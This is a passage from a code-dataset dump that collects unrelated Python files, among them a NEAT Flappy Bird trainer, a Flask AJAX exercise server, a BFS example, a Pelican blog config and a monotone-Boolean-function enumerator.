c_ulong\ndll.AD7190_ContinuousReadAvg.argtypes = [c_ubyte];\ndef continuous_read_avg(*args):\n return dll.AD7190_ContinuousReadAvg(*args)\n\n# Read data from temperature sensor and converts it to Celsius degrees.\ndll.AD7190_TemperatureRead.restype = c_ulong\ndll.AD7190_TemperatureRead.argtypes = [];\ndef temperature_read(*args):\n return dll.AD7190_TemperatureRead(*args)\n","sub_path":"ad7190_linux/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"336456331","text":"from bird import Bird\nimport pygame\nimport time\nimport neat\nimport os\nimport random\npygame.font.init()\n\nGEN = 0\n\nWIN_WIDTH = 550\nWIN_HEIGHT = 800\n\nBIRD_IMGS = [pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird1.png\"))), pygame.transform.scale2x(\n pygame.image.load(os.path.join(\"imgs\", \"bird2.png\"))), pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird3.png\")))]\nPIPE_IMGS = pygame.transform.scale2x(\n pygame.image.load(os.path.join(\"imgs\", \"pipe.png\")))\nBG_IMG = pygame.transform.scale2x(\n pygame.image.load(os.path.join(\"imgs\", \"bg.png\")))\nBASE_IMG = pygame.transform.scale2x(\n pygame.image.load(os.path.join(\"imgs\", \"base.png\")))\n\nSTATE_FONT = pygame.font.SysFont(\"comicsans\", 50)\n\n\nclass Pipe:\n # Space between pipe\n GAP = 200\n # Speed of the pipe moving backwards\n VEL = 5\n\n def __init__(self, x):\n self.x = x\n self.height = 0\n # Keep track of where the top and bottom pipe will be drawn\n self.top = 0\n self.bottom = 0\n\n self.PIPE_TOP = pygame.transform.flip(PIPE_IMGS, False, True)\n self.PIPE_BOTTOM = PIPE_IMGS\n # Check if this current pipe has pass the bird\n self.passed = False\n self.set_height()\n\n # Used to define how tall both pipes are\n def set_height(self):\n # PIP_TOP's height is 640\n self.height = random.randrange(50, 450)\n self.top = self.height - self.PIPE_TOP.get_height()\n self.bottom = self.height + self.GAP\n # print(self.top, self.bottom)\n\n def move(self):\n self.x -= self.VEL\n\n def draw(self, win):\n win.blit(self.PIPE_TOP, (self.x, self.top))\n win.blit(self.PIPE_BOTTOM, (self.x, self.bottom))\n\n def collide(self, bird, win):\n bird_mask = bird.get_mask()\n top_mask = pygame.mask.from_surface(self.PIPE_TOP)\n bottom_mask = pygame.mask.from_surface(self.PIPE_BOTTOM)\n # Offset between the top pipe's mask and the birds masks\n top_offset = (self.x - bird.x, self.top - round(bird.y))\n bottom_offset = (self.x - bird.x, self.bottom - round(bird.y))\n\n # Find their point of collision\n b_point = bird_mask.overlap(bottom_mask, bottom_offset)\n t_point = bird_mask.overlap(top_mask, top_offset)\n\n # if any part of the bird mask overlaps with either the top pipe mask or bottom pipe mask, end the game with the boolean true\n if b_point or t_point:\n return True\n\n return False\n\n\nclass Base:\n # Same speed as pipes\n VEL = 5\n # Get the actual width of this image\n WIDTH = BASE_IMG.get_width()\n IMG = BASE_IMG\n\n def __init__(self, y):\n self.y = y\n self.x1 = 0\n self.x2 = self.WIDTH\n\n def move(self):\n self.x1 -= self.VEL\n self.x2 -= self.VEL\n\n if self.x1 + self.WIDTH < 0:\n self.x1 = self.x2 + self.WIDTH\n\n if self.x2 + self.WIDTH < 0:\n self.x2 = self.x1 + self.WIDTH\n\n def draw(self, win):\n win.blit(self.IMG, (self.x1, self.y))\n win.blit(self.IMG, (self.x2, self.y))\n\n\ndef draw_window(win, birds, pipes, base, score, generation):\n win.blit(BG_IMG, (0, 0))\n for pipe in pipes:\n pipe.draw(win)\n for bird in birds:\n bird.draw(win)\n text = STATE_FONT.render(\"Score: \" + str(score), 1,\n (255, 255, 255))\n win.blit(text, (WIN_WIDTH - 10 - text.get_width(), 10))\n\n text = STATE_FONT.render(\"Gen: \" + str(generation), 1,\n (255, 255, 255))\n win.blit(text, (10, 10))\n text = STATE_FONT.render(\"Birds: \" + str(len(birds)), 1,\n (255, 255, 255))\n win.blit(text, (200, 10))\n\n base.draw(win)\n pygame.display.update()\n\n\ndef main(genomes, config):\n global GEN\n GEN += 1\n neural_networks = []\n ind_genome = []\n birds = []\n\n for _, genome in genomes:\n network = neat.nn.FeedForwardNetwork.create(genome, config)\n neural_networks.append(network)\n genome.fitness = 0 # Initial fitness set to 0\n ind_genome.append(genome)\n birds.append(Bird(230, 350))\n\n # So that it is at the bottom of our screen cause our height is 800\n base = Base(730)\n pipes = [Pipe(600)]\n # Clock.tick controls the number of ticks for each while loop\n clock = pygame.time.Clock()\n win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n run = True\n score = 0\n while run:\n clock.tick(30)\n add_pipe = False\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.quit()\n quit()\n pipe_index = 0\n if len(birds) > 0:\n if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_BOTTOM.get_width():\n pipe_index = 1\n else:\n # if no bird left quit the game\n run = False\n break\n # Checking the out put value\n for index, bird in enumerate(birds):\n bird.move()\n ind_genome[index].fitness += 0.1\n # Passing in the 3 arguements defined in config-feedforward for our input layer\n output = neural_networks[index].activate((bird.y, abs(\n bird.y - pipes[pipe_index].height), abs(bird.y - pipes[pipe_index].bottom)))\n\n if output[0] > 0.5:\n bird.jump()\n\n for pipe in pipes:\n pipe.move()\n for index, bird in enumerate(birds):\n # Check if each bird has collided\n # If the bird has collided ajust its fitness value\n # -1 from the activation function\n if pipe.collide(bird, win):\n ind_genome[index].fitness -= 1\n birds.pop(index)\n neural_networks.pop(index)\n ind_genome.pop(index)\n\n # pipes.append(Pipe(700))\n # if pipe.x =7 300:\n # pipes.append(Pipe(700))\n # Bird has not passed the pipe boolean, and actual position of pipe is behind the x position of the bird\n if not pipe.passed and pipe.x < bird.x:\n pipe.passed = True\n add_pipe = True\n if pipe.x + pipe.PIPE_BOTTOM.get_width() < 0:\n print(\"Removing pipe\")\n pipes.pop(0)\n # Added score and pipes\n if add_pipe:\n score += 1\n for genome in ind_genome:\n genome.fitness += 5\n pipes.append(Pipe(600))\n\n for index, bird in enumerate(birds):\n if bird.y + bird.img.get_height() >= 730 or bird.y < 0:\n birds.pop(index)\n neural_networks.pop(index)\n ind_genome.pop(index)\n\n base.move()\n draw_window(win, birds, pipes, base, score, GEN)\n\n\ndef run(file):\n # Load config file\n config = neat.config.Config(\n neat.DefaultGenome,\n neat.DefaultReproduction,\n neat.DefaultSpeciesSet,\n neat.DefaultStagnation,\n file)\n # Set up pop\n population = neat.Population(config)\n\n # give us some print() in console\n population.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n population.add_reporter(stats)\n\n # Running 50 gens (Calling the main function 50 times)\n winner = population.run(main, 50)\n\n\n# time.sleep(4)\n# Give us our current dir\nif __name__ == \"__main__\":\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, \"config-feedforward.txt\")\n run(config_path)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"213517301","text":"from django.shortcuts import render\nimport datetime\nimport sys\nsys.path.append('..')\nfrom information.models import Information\nfrom theme.models import Theme\n\n\n\ndef main(request):\n theme = Theme.objects.all()\n info = Information.objects.all()\n now = datetime.datetime.now()\n nowDate = now.strftime('%Y-%m-%d')\n print(nowDate)\n return render(request, 'main.html', {\n 'today': nowDate,\n 'info': info,\n 'theme': theme,\n })\n","sub_path":"Desktop/rooms/movie/ch1/mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"349401630","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef f(x, const):\n return lambda x: An(n) * np.cos(const * n) + Bn(n) * np.sin(const * n)\n\ndef fab():\n return lambda n: 1/(np.pi**2 * n**2), lambda n: -1/(np.pi * n)\n\ndef plotSeries(x, S):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(x, S)\n plt.show()\n \na = 0\nb = 1\na0 = 2/3\nrng = int(input('Wpisz range: '))\nT = b-a\nx = np.linspace(a, b, num=1000)\nS = np.zeros((x.shape))\n\nAn, Bn = fab()\nconst = 2 * np.pi * x / T\nf = f(x, const)\nimport time\n\nfig, ax = plt.subplots()\nline, = ax.plot(x, S)\n#ax.set_xlim(a,b)\n#ax.set_ylim(-0.2,1.2)\nax.grid()\n#plt.autoscale()\nfor k in range(1, rng+1):\n S = 0\n nrng = k\n for i in range(1, nrng+1):\n n = i\n S += f(x)\n S += a0/2\n line.set_ydata(S)\n ax.relim()\n ax.autoscale()\n plt.draw()\n plt.pause(0.05)\n\n\nplt.show()\n\n","sub_path":"Lab1/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"1167135","text":"\"\"\"Flask server for AJAX exercise.\n\nIMPORTANT: you don't need to change this file at all to finish\nthe exercise!\n\"\"\"\n\n\nimport random\n\nfrom flask import Flask, request, render_template, jsonify\n\napp = Flask(__name__)\n\nFORTUNES = [\n \"Tomorrow your code will work properly.\",\n \"Your day ahead will be full of while loops.\",\n \"You will wake up one morning and discover you learned recursion in your sleep.\",\n \"@facebook will retweet an announcement about your Hackbright project.\",\n \"You will inherit a house in San Francisco.\",\n \"In the future, your fortune will be wrong.\",\n]\n\nWEATHER = {\n '94110': {'forecast': 'Rainy, damp, and rich with hipsters.', 'temp': '60F'},\n '99507': {'forecast': 'Warm, balmy, and good for sunbathing.', 'temp': '100F'},\n '94102': {'forecast': 'Delightful, clever, and full of Python.', 'temp': '55F'},\n}\n\nDEFAULT_WEATHER = {'forecast': 'Kind of boring.', 'temp': '68F'}\n\n@app.route('/')\ndef index():\n \"\"\"Show our index page.\"\"\"\n\n return render_template(\"index.html\")\n\n\n@app.route('/fortune')\ndef fortune():\n \"\"\"Return a single fortune as a text string (*not* the whole HTML page!)\"\"\"\n\n return random.choice(FORTUNES)\n\n\n@app.route('/weather.json')\ndef weather():\n \"\"\"Return a weather-info dictionary for this zipcode.\"\"\"\n\n zipcode = request.args.get('zipcode')\n weather_info = WEATHER.get(zipcode, DEFAULT_WEATHER)\n return jsonify(weather_info)\n\n\n@app.route('/order-melons.json', methods=['POST'])\ndef order_melons():\n \"\"\"Order melons and return a dictionary of result-code and result-msg.\"\"\"\n\n melon = request.form.get('melon_type')\n qty = int(request.form.get('qty'))\n\n if qty > 10:\n result_code = 'ERROR'\n result_text = \"You can't buy more than 10 melons\"\n elif qty > 0:\n result_code = 'OK'\n result_text = \"You have bought %s %s melons\" % (qty, melon)\n else:\n result_code = 'ERROR'\n result_text = \"You want to buy fewer than 1 melons? Huh?\"\n\n return jsonify({'code': result_code, 'msg': result_text})\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", debug=True)","sub_path":"week_4/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"415276481","text":"'''\n*Breadth First Search\n1) need vertexList, edgeList, adjacencyList, Queue\n2) return : in form of index list (in assumption that edgeList is consists of index of the node)\n3) input : graphs (ex- graphs = (vertexList, edgeList) )and starting index of node\n\n*When BFS is used?\n1) Finding Shortest Path (Dijkstra algorithm)\n'''\n\nvertexList = [0, 1, 2, 3, 4, 5, 6] #['A', 'B', 'C', 'D', 'E', 'F', 'G']\nedgeList = [(0,1), (1,2), (1,3), (3,4), (4,5), (1,6)]\ngraphs = (vertexList, edgeList)\n\ndef bfs(graph, start) :\n vertexList,edgeList = graph\n\n visitedVertex = []\n queue=[start]\n\n adjacencyList = [[] for vertex in vertexList] #[[], [], [], [], [], [], []]\n print(adjacencyList)\n for edge in edgeList:\n adjacencyList[edge[0]].append(edge[1])\n #adjacencyList: [[1], [2, 3, 6], [], [4], [5], [], []]\n\n while queue:\n current=queue.pop(0) #dequeue\n for neighbor in adjacencyList[current]:\n if not neighbor in visitedVertex:\n queue.append(neighbor) #enqueue\n # end of for loop, adjacencyList[current] might be [2,3,6]\n visitedVertex.append(current)\n #end of while\n\n\n return visitedVertex\n\nprint(bfs(graphs,0))\n#[0, 1, 2, 3, 6, 4, 5]\n","sub_path":"search/02_breadthFirstSearch.py","file_name":"02_breadthFirstSearch.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120745532","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nAUTHOR = u'Ian Bicking'\nSITENAME = u'Ian Bicking: a blog'\nSITEURL = 'http://www.ianbicking.org'\n#FEED_DOMAIN = \"http://ianbicking.org\"\n\nimport os\nif os.environ.get(\"OVERRIDE_SITEURL\"):\n SITEURL = os.environ[\"OVERRIDE_SITEURL\"]\n\nTIMEZONE = 'US/Central'\nDATE_FORMATS = {\n \"en\": \"%A, %d %B, %Y\",\n }\nARTICLE_URL = \"blog/{date:%Y}/{date:%m}/{slug}.html\"\nARTICLE_SAVE_AS = \"blog/{date:%Y}/{date:%m}/{slug}.html\"\nPAGE_URL = \"{slug.html}\"\nPAGE_SAVE_AS = \"{slug}.html\"\nDIRECT_TEMPLATES = ('blog/index', 'tags', 'categories', 'archives')\nPAGINATED_DIRECT_TEMPLATES = ['blog/index']\nARTICLE_EXCLUDES = [\"pages\", \"old\"]\nFEED_ATOM = \"feeds/atom.xml\"\nCATEGORY_FEED_ATOM = \"feeds/%s.atom.xml\"\nFEED_MAX_ITEMS = 20\nRELATIVE_URLS = False\nSTATIC_PATHS = [\"media\"]\nTAG_URL = 'tag/{slug}.html'\nTAG_SAVE_AS = 'tag/{slug}.html'\n\nMD_EXTENSIONS = [\n 'codehilite(css_class=highlight)', # Default\n 'extra', # Default\n 'cite', # Extra support\n ]\n\n\ndef FORMAT_DATE(date):\n d = date.strftime(\"%A, %B \")\n day = str(date.day)\n if day[-1] == \"1\":\n day += \"st\"\n elif day[-1] == \"2\":\n day += \"nd\"\n elif day[-1] == \"3\":\n day += \"rd\"\n else:\n day += \"th\"\n d += day + date.strftime(\", %Y\")\n return d\n\nTYPOGRIFY = True\n\nDEFAULT_LANG = u'en-US'\n\n# Blogroll\nLINKS = (\n )\n\nUSE_FOLDER_AS_CATEGORY = False\n\n# built-texts, cebong\n#THEME = '/Users/ianbicking/src/blog.pelican/pelican-themes/built-texts'\nTHEME = './mystyle/'\n\n# Social widget\nSOCIAL = (\n ('Google+', 'https://plus.google.com/+IanBicking/posts'),\n ('@ianbicking (G+ mirror)', 'https://twitter.com/ianbicking'),\n ('Github', 'https://github.com/ianb'),\n )\n\nDEFAULT_PAGINATION = 10\n\nPLUGINS = [\n 'pelican.plugins.github_activity',\n 'pelican.plugins.related_posts',\n 'pelican.plugins.assets',\n ]\n\nGITHUB_ACTIVITY_FEED = 'https://github.com/ianb.atom'\n\n\nDISQUS_SITENAME = \"ianbicking\"\nGOOGLE_ANALYTICS = \"UA-2442258-1\"\n\nMENUITEMS = [\n #(\"About\", \"/about.html\"),\n (\"blog\", \"/blog/\"),\n (\"projects\", \"/projects.html\"),\n ]\n\nFILES_TO_COPY = (('favicon.ico', 'favicon.ico'),)\n\nWEBASSETS = True\nDISPLAY_PAGES_ON_MENU = False\nGETATTR = getattr\n\nimport os\nwith open(os.path.join(os.path.dirname(__file__), \"content/old/archive-fragment.html\")) as fp:\n EXTRA_ARCHIVE = fp.read()\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"522225666","text":"#### Visualization in 2D ####\n### Elementary Plot ###\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sympy\nfrom Luke_Color import *\n\n# Global Setting\nplt.rcParams['font.family'] = 'CMU Serif' # Require CMU Serif font file. If not found, clear /home/luke/.cache/matplotlib\nplt.rcParams['font.size'] = '14' # Font Size\nplt.rcParams['mathtext.fontset'] = 'cm' # cm: Computer Mathematics\nplt.rcParams['mathtext.rm'] = 'CMU Serif' # Require CMU Serif font file\n#plt.rcParams['text.usetex'] = True # Require TeX environment\nformatter = mpl.ticker.ScalarFormatter(useMathText=True)\nformatter.set_scientific(True) \nformatter.set_powerlimits((-1,1))\n\nfig, ax = plt.subplots(figsize=(8,6))\nfig.suptitle('SupTitle', size='18', color='black')\n\nx = np.linspace(-10,20,1000)\ny = x**3+5*x**2+10\nz = 3*x**2+10*x\na = 6*x+10\ng = 100*np.sin(50*x)*np.exp(-x**2)+200\nm = x**3-30*x\nn = x**4\n\nax.set_title(\"SubTitle\", size=16, color='black')\n\n# Line\nax.plot(x, y, label=\"y(x)\",color=myGold)\nax.plot(x, z, label=\"z(x)\",color=myRed)\nline,=ax.plot(x, a, label='a(x)',color=myOrange); line.set_dashes([1,1])\nline,=ax.plot(x, g, alpha=1.0,label='Gaussian(x)',color=myGreen); line.set_dashes([1,0])\nax.plot(x, m, label=\"m(x)\",color=myBlue)\nax.plot(x, n, label=\"n(x)\",color=myPurple)\n\n# Load Data\nx, y = np.loadtxt('04 Visualization/data01.dat', unpack=True)\nline,=plt.plot(20*x-5, 1000*y, antialiased=True,label='Data',color=myViolet); line.set_dashes([1,0])\n\n# Text label\nax.text(0, 800, \"Text label\", fontsize=14, family=\"cmr10\",bbox=dict(boxstyle='round',ec=(0.84,0.84,0.84,0.5),fc=(1.0,1.0,1.0,0.5)))\n\n# Annotation\nax.plot(1, 0, \"o\")\nax.annotate(\"Annotation\",fontsize=14, family=\"cmr10\",xy=(1, 0), xycoords=\"data\",xytext=(+10, +100), textcoords=\"offset points\", arrowprops=dict(arrowstyle=\"->\", connectionstyle=\"arc3, rad=-0.5\"))\n\nax.grid(True, linestyle='--', color='#C8C8C8') # Grid\nax.legend(loc='best') # Label\n#ax.legend(bbox_to_anchor=(1.02, 1), loc=2, borderaxespad=0.0) # Label (outside)\nax.set(xlabel=\"X-Axis $x$\") # X-Axis Label\nax.set(ylabel=\"Y-Axis $y=f(x)$\") # X-Axis Label\nplt.xlim(-5, 11)\nplt.ylim(-100, 1100)\nplt.xticks([-4,-2,0,2,4,6,8,10], ['$-4$','$-2$','$0$','$2$','$4$','$6$','$8$','$10$'])\nplt.yticks([0,200,400,600,800,1000], ['$0$','$200$','$400$','$600$','$800$','$1.0×10^3$'])\n#ax.xaxis.set_major_formatter(formatter) # Scientific Counting Method: If you use this, Please close plt.xticks\n#ax.yaxis.set_major_formatter(formatter) # Scientific Counting Method: If you use this, Please close plt.xticks\nax.set_axisbelow(True)\nax.tick_params(direction='in', top=True, right=True, bottom=True, left=True, which='both')\n#mpl.ticker.LogLocator()\n\nfig.savefig(\"2D Elementary Plot Py.pdf\", dpi=1080)\nplt.show()\n\n### More Information ###\n# https://matplotlib.org","sub_path":"Python Matplotlib/2D Elementary Plot.py","file_name":"2D Elementary Plot.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"140161988","text":"#! /usr/bin/python3\n\nimport sys\nimport os\nimport langid\nimport collections\n\ndef test_one(ident, cm, xfail_languages, fname):\n lang = os.path.basename(fname)\n lang = lang[:lang.find('.')]\n if lang[-1] == '_':\n lang = lang[:-1]\n xfail_languages.add(lang)\n\n with open(fname) as f:\n text = \"\\n\".join(ll for ll in (l.strip() for l in f)\n if ll and ll[0] != '#')\n\n result = ident.classify(text)[0]\n cm[lang][result] += 1\n\ndef main():\n ident = langid.LanguageIdentifier.from_model(norm_probs=False)\n cm = collections.defaultdict(collections.Counter)\n\n xfail_languages = set()\n for fname in os.listdir(\"tests\"):\n if fname.endswith(\".txt\"):\n test_one(ident, cm, xfail_languages, \"tests/\" + fname)\n\n all_languages = set()\n for row, col in cm.items():\n all_languages.add(row)\n all_languages.update(col.keys())\n\n misid_from = set()\n misid_to = set()\n for row in all_languages:\n for col in all_languages:\n if row != col:\n if cm[row][col]:\n misid_from.add(row)\n misid_to.add(col)\n\n misid_from = sorted(misid_from)\n misid_to = sorted(misid_to)\n\n sys.stdout.write(\"\\n\\n\"\n \"\\n\"\n \"

\\n\")\n for lang in misid_to:\n cl = (' class=\"x\"' if lang in xfail_languages else '')\n sys.stdout.write(\"{}\".format(cl, lang))\n sys.stdout.write(\"\\n\")\n for row in misid_from:\n cl = (' class=\"x\"' if row in xfail_languages else '')\n sys.stdout.write(\"{}\".format(cl, row))\n for col in misid_to:\n n = cm[row][col]\n cl = \"\"\n if n > 0:\n if row == col:\n cl = \"y\"\n else:\n cl = \"n\"\n if row in xfail_languages or col in xfail_languages:\n cl += \"x\"\n if cl:\n cl = ' class=\"{}\"'.format(cl)\n if n > 1:\n sys.stdout.write(\"{}\".format(cl, n))\n else:\n sys.stdout.write(\"\".format(cl))\n sys.stdout.write(\"\\n\")\n sys.stdout.write(\"
\\n\")\n\nmain()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"551124685","text":"#! python3\n\n#TODO:\n# work on applying the aggregation functions to the dataframe\n# place this all in a function call\n\nimport sqlite3\nimport AHutils\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport pandas\nimport math\n\n#Connect to SQLite DB\nprint(\"Connecting to SQLite database...\")\nconn = sqlite3.connect('Data/Database/wowAH.db')\nc = conn.cursor()\n\n\n\ndf = pandas.read_sql_query(AHutils.db_Query_ItemSummary(conn, 'Formula: Enchant Cloak - Greater Resistance'), conn)\n\n#add weighted rolling average\n#probably want to turn this into a function\n#i believe this calculation is wrong, need to check\nweightedRollingAvg = []\nif len(df[\"MinBuy\"]) >=5:\n for i in range(0,4):\n weightedRollingAvg.append(None)\n for i in range(4,len(df[\"MinBuy\"])):\n MovAvg = 0\n MovAvg = MovAvg + df[\"MinBuy\"][i] * 5\n MovAvg = MovAvg + df[\"MinBuy\"][i-1] * 4\n MovAvg = MovAvg + df[\"MinBuy\"][i-2] * 3\n MovAvg = MovAvg + df[\"MinBuy\"][i-3] * 2\n MovAvg = MovAvg + df[\"MinBuy\"][i-4]\n MovAvg = int(round(MovAvg/(5+4+3+2)))\n weightedRollingAvg.append(MovAvg)\ndf[\"WMA\"] = weightedRollingAvg\n\n\n# Percent Change since beginning of dataframe\nbegVal = df[\"MinBuy\"][0]\nPercentChange = []\nif len(df[\"MinBuy\"]) >=1:\n for i in range(0,len(df[\"MinBuy\"])):\n tempVal = 0.0\n tempVal = round((df[\"MinBuy\"][i] - begVal)/begVal, 4)*100\n PercentChange.append(tempVal)\ndf[\"Delta\"] = PercentChange\n\n\n\n#percent change from prior day\nbegVal = df[\"MinBuy\"][0]\nDailyPercentChange = []\nif len(df[\"MinBuy\"]) >= 1:\n DailyPercentChange.append(0.0)\n for i in range(1,len(df[\"MinBuy\"])):\n tempVal = 0.0\n tempVal = round((df[\"MinBuy\"][i] - df[\"MinBuy\"][i-1])/df[\"MinBuy\"][i-1], 4)*100\n DailyPercentChange.append(tempVal)\ndf[\"DailyDelta\"] = DailyPercentChange\n#print(len(PercentChange))\nprint(df)\n\n\n\nfig = px.line(df, x=\"Date\", y=\"WMA\", color = \"Item\", title='Minimum Price')\n\n\nfig.for_each_trace(\n lambda trace: trace.update(name=trace.name.replace(\"Item=\", \"\")),\n)\n\nfig.show()\n\n\nfrom plotly.subplots import make_subplots\n\n# Create figure with secondary y-axis\nfig2 = make_subplots(specs=[[{\"secondary_y\": True}]])\n\nfig2.add_trace(\n go.Bar(x = df[\"Date\"], y = df[\"Volume\"], name = 'Volume'),\n secondary_y = False\n)\n\nfig2.add_trace(\n go.Scatter(x = df[\"Date\"], y = df[\"Delta\"], name = 'Delta'),\n secondary_y = True\n)\n\n\nfig.update_layout(\n title_text=\"% Change and Volume\"\n)\n# Set x-axis title\nfig.update_xaxes(title_text=\"Date\")\n\n# Set y-axes titles\nfig.update_yaxes(title_text=\"primary yaxis title\", secondary_y=False)\nfig.update_yaxes(title_text=\"secondary yaxis title\", secondary_y=True)\n\nfig2.show()\n\n\nc.close()\nconn.close()\n\n\n\n\n","sub_path":"report_testing.py","file_name":"report_testing.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"195864903","text":"# A non-empty zero-indexed array A consisting of N integers is given. Array A represents a linked list. A list is constructed from this array as follows:\n# the first node (the head) is located at index 0;\n# the value of a node located at index K is A[K];\n# if the value of a node is −1 then it is the last node of the list; otherwise, the successor of a node located at index K is located at index A[K]\n# (you can assume that A[K] is a valid index, that is 0 ≤ A[K] < N).\n\n# For example, for array A such that:\n# A[0] = 1\n# A[1] = 4\n# A[2] = -1\n# A[3] = 3\n# A[4] = 2\n\n# the following list is constructed: \n# the first node (the head) is located at index 0 and has a value of 1;\n# the second node is located at index 1 and has a value of 4;\n# the third node is located at index 4 and has a value of 2;\n# the fourth node is located at index 2 and has a value of −1.\n# Write a function:\n\n# class Solution { \n# public int solution(int[] A); \n# }\n\n# that, given a non-empty zero-indexed array A consisting of N integers, returns the length of the list constructed from\n# A in the above manner. \n# For example, given array A such that:\n# A[0] = 1\n# A[1] = 4\n# A[2] = -1\n# A[3] = 3\n# A[4] = 2\n# the function should return 4, as explained in the example above.\n# Assume that:\n# N is an integer within the range\n# [1..200,000];\n# each element of array A is an integer\n# within the range [−1..N−1];\n# it will always be possible to construct the list and its length will be nite.\n\n# In your solution, focus on correctness. The performance\n# of your solution will not be the focus of the assessment.\n\nimport unittest\nimport random\n\nINT_RANGE = (1, 200000)\n\nclass Solution(object):\n def solution(self, A):\n if len(A) == 1:\n if A[0] == -1:\n return 1\n else:\n return 0\n next = A[0]\n size = 0\n while next != -1 and size < len(A):\n next = A[next]\n size += 1\n return size + 1\n \nclass Test(unittest.TestCase):\n\n def __init__(self, _):\n super(Test, self).__init__(_)\n self.s = Solution()\n\n def test_example(self):\n self.assertEqual(self.s.solution([1, 4, -1, 3, 2]), 4)\n\n def test_single(self):\n self.assertEqual(self.s.solution([1]), 0)\n\n def test_two(self):\n self.assertEqual(self.s.solution([-1]), 1)\n\n def test_extreme(self):\n arr = [X for X in range(1, INT_RANGE[1] - 1)]\n i = random.randint(1, INT_RANGE[1])\n arr.insert(i, -1)\n self.assertEqual(self.s.solution(arr), i + 1)\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()","sub_path":"codility/arr_list_len.py","file_name":"arr_list_len.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"448741855","text":"from __future__ import print_function\nimport bz2\nimport multiprocessing\nimport os\nimport pickle\nimport time\nfrom utils import cpu_time\nfrom inequivalent import compute_permutations\nfrom inequivalent import find_inequivalent_mbfs\n\nnprofiles_done = 0\ncount = 0\npermutations = None\noutdir = None\n\ndef compute_number_of_inequivalent_mbfs_cb(result):\n global count\n global nprofiles_done\n\n profile, nmbfs, nimbfs, t = result\n nprofiles_done += 1\n count += nimbfs\n\n print(\"%d. Profile %s done!\\t%10d (/%d) inequivalent MBFs found \" \\\n \"(%.02f seconds)\" % (nprofiles_done, str(profile), nimbfs, nmbfs, t))\n\ndef compute_inequivalent_mbfs(filepath):\n global permutations\n global outdir\n\n t1 = cpu_time()\n\n f = bz2.BZ2File(filepath, 'rb')\n mbfs = pickle.load(f)\n nmbfs = len(mbfs)\n imbfs = find_inequivalent_mbfs(mbfs, permutations)\n f.close()\n\n t = cpu_time() - t1\n\n profile = os.path.splitext(os.path.basename(filepath))[0]\n profile = os.path.splitext(profile)[0]\n profile = tuple(map(int, profile.split(\"-\")))\n\n if outdir is not None:\n filenameout = \"-\".join(map(str, profile)) + \".pkl.bz2\"\n fileout = bz2.BZ2File(outdir + filenameout, 'wb')\n pickle.dump(imbfs, fileout)\n fileout.close()\n\n return profile, nmbfs, len(imbfs), t\n\ndef compute_all_inequivalent_mbfs(n, indir, outd = None):\n global count\n global outdir\n global permutations\n\n indir = indir + \"/\" if indir is not None else None\n outdir = outd + \"/\" if outd is not None else None\n\n n = tuple((i + 1) for i in range(n))\n permutations = compute_permutations(n)\n\n t1 = time.time()\n\n print(\"Number of CPUs: %d\" % multiprocessing.cpu_count())\n\n pool = multiprocessing.Pool()\n n = 0\n for f in os.listdir(indir):\n if f.endswith(\".pkl.bz2\") is False:\n continue\n\n pool.apply_async(compute_inequivalent_mbfs,\n (indir + f,),\n callback = compute_number_of_inequivalent_mbfs_cb)\n\n pool.close()\n pool.join()\n\n print(\"total time: %.02f seconds\" % (time.time() - t1))\n print(count)\n\nif __name__ == \"__main__\":\n import sys\n import multiprocessing\n\n if len(sys.argv) < 3:\n print(\"usage: %s n indir [outdir]\" % sys.argv[0])\n sys.exit(1)\n\n outd = sys.argv[3] if len(sys.argv) > 3 else None\n compute_all_inequivalent_mbfs(int(sys.argv[1]), sys.argv[2], outd)\n","sub_path":"compute_inequivalent_mbfs.py","file_name":"compute_inequivalent_mbfs.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"182273271","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pytest\n\nimport pyFLUT.beta as beta\nimport 